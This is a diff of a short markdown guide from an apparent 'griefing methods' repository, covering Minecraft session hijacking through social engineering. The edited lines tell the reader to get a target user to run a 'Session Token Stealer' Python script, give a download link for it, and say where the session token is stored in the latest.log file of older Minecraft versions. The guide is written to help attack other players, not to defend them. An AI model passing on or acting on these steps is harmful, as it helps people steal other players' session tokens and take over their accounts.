wodxgod/Griefing-Methods/Social Engineering/Session Hijacking.md

 **Getting the token**

 There are different ways to get a user's session token.
-One way of doing it, is by making the target user run a Python script developed by WodX.
-Download it [here](https://github.com/WodxTV/Minecraft-Session-Token-Stealer).
+One way of doing it, is by making the target user run a Python script developed by me (wodx).
+Download it [here](https://github.com/wodxgod/Minecraft-Session-Token-Stealer).

 In the 1.8.9 versions of Minecraft and below, the latest session token can be found in the top of the latest.log file located at `%appdata%\.minecraft\logs\latest.log`.